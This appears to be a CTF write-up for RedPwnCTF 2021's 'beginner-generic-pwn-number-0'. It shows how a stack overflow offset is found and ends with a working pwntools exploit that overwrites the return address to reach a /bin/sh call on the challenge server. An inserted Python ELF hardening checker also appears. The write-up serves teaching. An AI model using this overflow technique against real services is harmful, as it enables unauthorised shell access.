RedPwnCTF-2021 - Writeup - pwn/beginner-generic-pwn-number-0
Greetings everyone!
This is going to be a writeup about the challenge beginner-generic-pwn-number-0 of the pwn category from RedPwnCTF 2021.
Challenge 1: beginner-generic-pwn-number-0
Running the binary with the sample input test simply exited the program with no error code, while running it with a very long input threw a segmentation fault. So the program had a buffer overflow vulnerability.
Then I tried to find the number of bytes after which the overflow occurred. I printed a large number of 'A' characters and passed them to the program, which caused it to crash with the same segmentation fault:
perl -E "print 'A' x 58" | ./beginner-generic-pwn-number-0
Then I ran the dmesg command to print the kernel message buffer. The output showed that the crash was caused by a bad value in the RIP register: the bytes 4141 are the two extra A characters that the buffer couldn't hold, and they overwrote the saved instruction pointer.
As we printed out 58 A characters and two of them were extra, the required offset is 58-2, which equals 56.
Now it's time to analyze the binary with radare2.
I opened the binary in radare2 with the command r2 beginner-generic-pwn-number-0 and analyzed it with aaaa.
I extracted the binary info with the iI command.
As the binary didn't have the stack canary enabled and wasn't stripped, exploiting it was easy.
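The iI step is really a hardening audit, so here is an added example (not part of the original writeup) that performs the same three checks, PIE, stack canary and stripping, on raw ELF64 bytes using only the Python standard library. The ELF images it runs on are constructed inline, and the canary and symbol-table checks are string heuristics rather than a full ELF parse, which is an assumption of this example.

```python
import struct
import sys

# Hardening check over raw ELF64 bytes, in the spirit of radare2's iI output.
# Assumption (heuristic, not a full ELF parse): a canary-protected dynamic binary
# references __stack_chk_fail, and an unstripped one still names a .symtab section.
ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3

def check_hardening(data: bytes) -> dict:
    """Return {'pie', 'canary', 'stripped'} flags for an ELF64 image given as bytes."""
    if len(data) < 64 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[4] != 2:
        raise ValueError("only ELF64 is handled here")
    endian = "<" if data[5] == 1 else ">"            # EI_DATA: 1 = little-endian
    (e_type,) = struct.unpack_from(endian + "H", data, 16)
    return {
        "pie": e_type == ET_DYN,                      # ET_DYN executable => position independent
        "canary": b"__stack_chk_fail" in data,        # stack-protector failure handler referenced
        "stripped": b".symtab" not in data,           # no .symtab section name => symbols stripped
    }

def _fake_elf(e_type: int, strings: bytes) -> bytes:
    """Constructed sample: a valid 64-byte ELF64 little-endian header plus fake name strings."""
    ident = ELF_MAGIC + bytes([2, 1, 1]) + b"\x00" * 9   # ELF64, little-endian, version 1
    header = ident + struct.pack(
        "<HHIQQQIHHHHHH",
        e_type, 0x3E, 1, 0x401000,    # e_type, EM_X86_64, e_version, e_entry
        64, 0, 0,                     # e_phoff, e_shoff, e_flags
        64, 56, 0, 64, 0, 0,          # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    )
    return header + strings

# Constructed inputs: one resembling the CTF binary (no PIE, no canary, symbols kept),
# one resembling a default hardened build.
UNHARDENED = _fake_elf(ET_EXEC, b"\x00.text\x00.symtab\x00main\x00")
HARDENED = _fake_elf(ET_DYN, b"\x00__stack_chk_fail\x00.text\x00")

def report(data: bytes) -> str:
    flags = check_hardening(data)
    return " ".join(f"{name}={'yes' if on else 'no'}" for name, on in flags.items())

if __name__ == "__main__":
    # Check a binary given on the command line, or show the two constructed samples.
    if len(sys.argv) > 1:
        print(report(open(sys.argv[1], "rb").read()))
    else:
        print("unhardened:", report(UNHARDENED), "| hardened:", report(HARDENED))
```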
Then I printed the function list with afl and seeked to the main function with s main.
Then I printed the disassembled code of the main function with the pdf command.
It can be seen that there is also an address, 0x004012ac, which calls a shell (/bin/sh).
As the instruction pointer can be controlled, it is possible to jump to the address where the shell can be executed.
I used pwntools to craft a simple exploit and got a shell.
from pwn import *
#elf = ELF('./beginner-generic-pwn-number-0')
#p = elf.process()
#print(p.recv())
p = remote("mc.ax", 31199)
# 56 bytes of padding up to the saved return address, then the address that calls /bin/sh
payload = b"A"*56 + p64(0x004012ac)
p.sendline(payload)
p.interactive()
And there it was: I got a shell, and got the flag.
Hope you learned something.
Thanks for reading!
- seizetheday